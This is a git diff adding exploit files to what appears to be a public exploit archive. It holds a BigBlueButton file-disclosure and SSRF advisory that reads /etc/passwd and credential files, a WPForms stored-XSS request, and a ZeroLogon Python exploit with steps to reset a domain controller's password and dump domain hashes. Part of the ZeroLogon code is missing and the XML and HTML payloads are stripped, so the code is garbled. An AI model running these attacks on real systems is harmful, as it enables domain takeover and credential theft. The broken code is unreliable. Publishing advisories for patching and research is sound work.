diff --git a/exploits/multiple/webapps/49070.txt b/exploits/multiple/webapps/49070.txt new file mode 100644 index 000000000..7a90d859a --- /dev/null +++ b/exploits/multiple/webapps/49070.txt @@ -0,0 +1,237 @@ +# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery +# Date: 2020-09-11 +# Exploit Author: RedTeam Pentesting GmbH +# Vendor Homepage: https://bigbluebutton.org/ +# Version: BigBlueButton 2.2.25 + + +RedTeam Pentesting discovered a vulnerability in the BigBlueButton web +conferencing system which allows participants of a conference with +permissions to upload presentations to read arbitrary files from the +file system and perform server-side requests. This leads to +administrative access to the BigBlueButton instance. + + +Details +======= + +Product: BigBlueButton +Affected Versions: 2.2.25, potentially earlier versions as well +Fixed Versions: 2.2.27 +Vulnerability Type: Arbitrary File Disclosure and + Server-Side Request Forgery +Security Risk: medium +Vendor URL: https://bigbluebutton.org/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 +Advisory Status: published +CVE: CVE-2020-25820 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 + + +Introduction +============ + +"BigBlueButton is a web conferencing system designed for online +learning." + +(from the vendor's homepage) + + +More Details +============ + +BigBlueButton is a web conferencing system that allows participants with +the appropriate privileges to upload files in various formats to be used +as presentation slides. Among other formats, BigBlueButton accepts +LibreOffice documents[1]. LibreOffice documents use the XML-based Open +Document Format for Office Applications (ODF)[2]. For technical +purposes, uploaded files are converted to PDF format with LibreOffice +and afterwards to SVG for displaying[6]. + +The ODF file format supports using the XML Linking Language (XLink) to +create links between documents[3]. When local files are referenced using +XLinks, the contents of the respective files are included in the +generated PDF file when BigBlueButton converts ODF documents with +LibreOffice. This leads to an arbitrary file disclosure vulnerability, +allowing malicious participants of conferences to extract files from the +BigBlueButton server's file system. + +LibreOffice also embeds XLinks to remote locations when a document is +converted, which allows to perform server-side requests. + + +Proof of Concept +================ + +Start from an empty ODF Text Document and extract the content: + +$ mkdir tmp-doc && cd tmp-doc +$ unzip ../empty.odt +Archive: empty.odt + extracting: mimetype + creating: Configurations2/accelerator/ + creating: Configurations2/images/Bitmaps/ + creating: Configurations2/toolpanel/ + creating: Configurations2/progressbar/ + creating: Configurations2/statusbar/ + creating: Configurations2/toolbar/ + creating: Configurations2/floater/ + creating: Configurations2/popupmenu/ + creating: Configurations2/menubar/ + inflating: manifest.rdf + inflating: meta.xml + inflating: settings.xml + extracting: Thumbnails/thumbnail.png + inflating: styles.xml + inflating: content.xml + inflating: META-INF/manifest.xml + + +Replace the element in the file content.xml with the +following: + + + + + + + + + +The text document now includes a section that references the external +file /etc/passwd. Create an new ODF Text Document with the modified +content: + +$ zip -r ../modified.odt * + +The document can now be uploaded as a presentation. After the +conversion, the presentation shows the contents of the file +/etc/passwd from the system running the BigBlueButton conferencing +software. To perform server-side requests, substitute the xlink:href +attribute's value with a remote URL such as http://example.com: + + + + + + + + + +When converting a document with this content, LibreOffice will fetch the +website's content and embed it into the generated PDF file. + + +Workaround +========== + +To work around this issue, the conversion feature should be disabled if +it is not used. Otherwise, permission to upload presentations should +only be given to trusted users. Additionally, the allowed file types for +upload can be restricted to just PDF files. + + +Fix +=== + +Update to fixed version 2.2.27. Change API key after update. + + + +Security Risk +============= + +As shown, the presentation conversion feature of BigBlueButton can be +used to disclose arbitrary local files. Through the file disclosure, +attackers can gain access to the credentials of the BigBlueButton +instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, +/usr/share/bbb-apps-akka/conf/application.conf), which allows for +administrative access to BigBlueButton through its API (see [5]), +including all conferences. + +Additionally, it is possible to perform server-side requests. Note that +this vulnerability is different from CVE-2018-10583 [4], because the +risk is not the disclosure of credentials sent while fetching remote +resources, but the ability to access resources that are in the same +network segment as the BigBlueButton instance, which is possibly not +accessible from the Internet. + +To exploit this vulnerability, attackers need to have access to a +conference with the ability to upload presentations. While successful +exploitation of this vulnerability would pose severe consequences for +the affected BigBlueButton instance, it is only rated to pose a medium +risk due to the requirement of having presentator access. + + +Timeline +======== + +2020-09-11 Vulnerability identified +2020-09-18 Customer approved disclosure to vendor +2020-09-22 CVE ID requested +2020-09-22 CVE ID assigned +2020-09-24 Requested encrypted communication with vendor +2020-09-25 Vendor unable to provide encrypted communication, + Vendor notified +2020-09-25 Vendor confirmed being able to reproduce vulnerability, + mentioned similar bugreport +2020-09-25 Requested information whether "similar burgreport" + uses the same vulnerability - no answer +2020-10-13 Again requested information whether "similar burgreport" + uses the same vulnerability, whether release shedule is + known - no answer +2020-10-14 Vendor released fixed version (without mentioning vulnerability) +2020-10-21 Vulnerability published by third party [7] +2020-10-21 Advisory released + + +References +========== + +[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton +[2] http://opendocumentformat.org/ +[3] https://www.w3.org/TR/xlink11/ +[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 +[5] https://docs.bigbluebutton.org/dev/api.html#usage +[6] https://docs.bigbluebutton.org/support/faq.html#presentations +[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/49069.txt b/exploits/php/webapps/49069.txt new file mode 100644 index 000000000..55e68f2ef --- /dev/null +++ b/exploits/php/webapps/49069.txt @@ -0,0 +1,44 @@ +#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated) +#Exploit Author : ZwX +#Exploit Date : 2020-10-23 +#Vendor Homepage : https://wpforms.com/ +#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip + + +[+] Description Vulnerability: +============================== + +A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower. +To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site. + + +[+] Proof Of Concept: +===================== + +# HTML Code # + + + + + +# Methode POST # + +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 7081 +Origin: http://localhost +Connection: close + +action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":""},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"

Merci de nous avoir contacté ! Nous vous contacterons rapidement.

"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a + + +# URL Proof Of Concept # + +http://localhost/?wpforms_form_preview=990 \ No newline at end of file diff --git a/exploits/windows/remote/49071.py b/exploits/windows/remote/49071.py new file mode 100755 index 000000000..e3ee1df1e --- /dev/null +++ b/exploits/windows/remote/49071.py @@ -0,0 +1,275 @@ +# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege +# Date: 2020-10-04 +# Exploit Author: West Shepherd +# Vendor Homepage: https://www.microsoft.com +# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 +# Tested on: Microsoft Windows Server 2016 Standard x64 +# CVE : CVE-2020-1472 +# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code +# Sources: https://www.secura.com/pathtoimg.php?id=2055 +# Requirements: python3 and impacket 0.9.21+ (tested using this version) +#!/usr/bin/env python3 +import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs +from binascii import hexlify, unhexlify +from subprocess import check_call +from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED +from impacket.dcerpc.v5 import nrpc, epm, transport +from impacket import crypto, version +from impacket.examples import logger +from Cryptodome.Cipher import AES +from struct import pack, unpack +from impacket.dcerpc.v5.rpcrt import DCERPCException + + +class Exploit: + def __init__( + self, + name='', + address='', + attempts=2000, + password='' + ): + name = name.rstrip('$') + self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\ + .ServerSecureChannel + self.authenticator = self.getAuthenticator(stamp=0) + self.clearNewPasswordBlob = b'\x00' * 516 + self.primaryName = ('\\\\%s' % name) + '\x00' + self.accountName = ('%s$' % name) + '\x00' + self.computerName = name + '\x00' + self.clientCredential = b'\x00' * 8 + self.clientChallenge = b'\x00' * 8 + self.negotiateFlags = 0x212fffff + self.address = address + self.max = attempts + self.dce = None + self.sessionKey = None + self.clientStoredCredential = None + self.password = password + + def encodePassword(self, password): + if isinstance(password, str): + password = password.encode('utf-8') + return b'\x00' * (512 - len(password))\ + + password \ + + pack(' -ip + + 2. Exploit the DC - this will break the DC until restored: + cve-2020-1472.py -do exploit -ip + + 3. Dump the DC - for the DA hashes, this will not contain the +machine hex-pass: + secretsdump.py -just-dc -no-pass \$@ + + 4. Dump the DC again - use the DA hash to get the machines hex-pass: + secretsdump.py -no-pass -hashes : /@ + + 5. Restore target - this fixes the DC: + cve-2020-1472.py -do restore -target -ip +-hex +""" + parser = argparse.ArgumentParser( + description='CVE-2020-1472 ZeroLogon Exploit - Netlogon +Elevation of Privilege', + add_help=True + ) + try: + parser.add_argument('-do', default='check', action='store', + help='What to do (default check): +[check|restore|exploit]') + parser.add_argument('-target', action='store', + help='NETBIOS name of target DC (not the FQDN)') + parser.add_argument('-ip', action='store', + help='IP address of target DC') + parser.add_argument('-password', default='', action='store', + help='The plaintext password to use to +reset the DC') + parser.add_argument('-hex', default='', action='store', + help='The hex password to use to restore +the DC (recommended)') + parser.add_argument('-max', default=2000, action='store', + help='Max attempts to authenticate with +the DC (usually ~300 or less)') + + if len(sys.argv) < 3: + parser.print_help() + print(info) + sys.exit(1) + options = parser.parse_args() + + if options.do.lower() == 'check': + Exploit( + name=options.target, + address=options.ip, + attempts=int(options.max) + ).authenticate() + elif options.do.lower() == 'exploit': + exp = Exploit( + name=options.target, + address=options.ip, + attempts=int(options.max) + ) + if exp.authenticate(): + exp.exploit() + elif options.do.lower() == 'restore': + if options.hex != '' and options.password == '': + options.password = unhexlify(options.hex) + if options.password != '': + exp = Exploit( + name=options.target, + address=options.ip, + password=options.password + ).restore() + else: + parser.print_help() + + except Exception as error: + sys.stderr.write('[-] error in main %s\n' % str(error)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b87781e04..acdc509c0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18298,6 +18298,7 @@ id,file,description,date,author,type,platform,port 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux, 49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple, 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple, +49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43296,3 +43297,5 @@ id,file,description,date,author,type,platform,port 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php, 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php, 49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php, +49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php, +49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,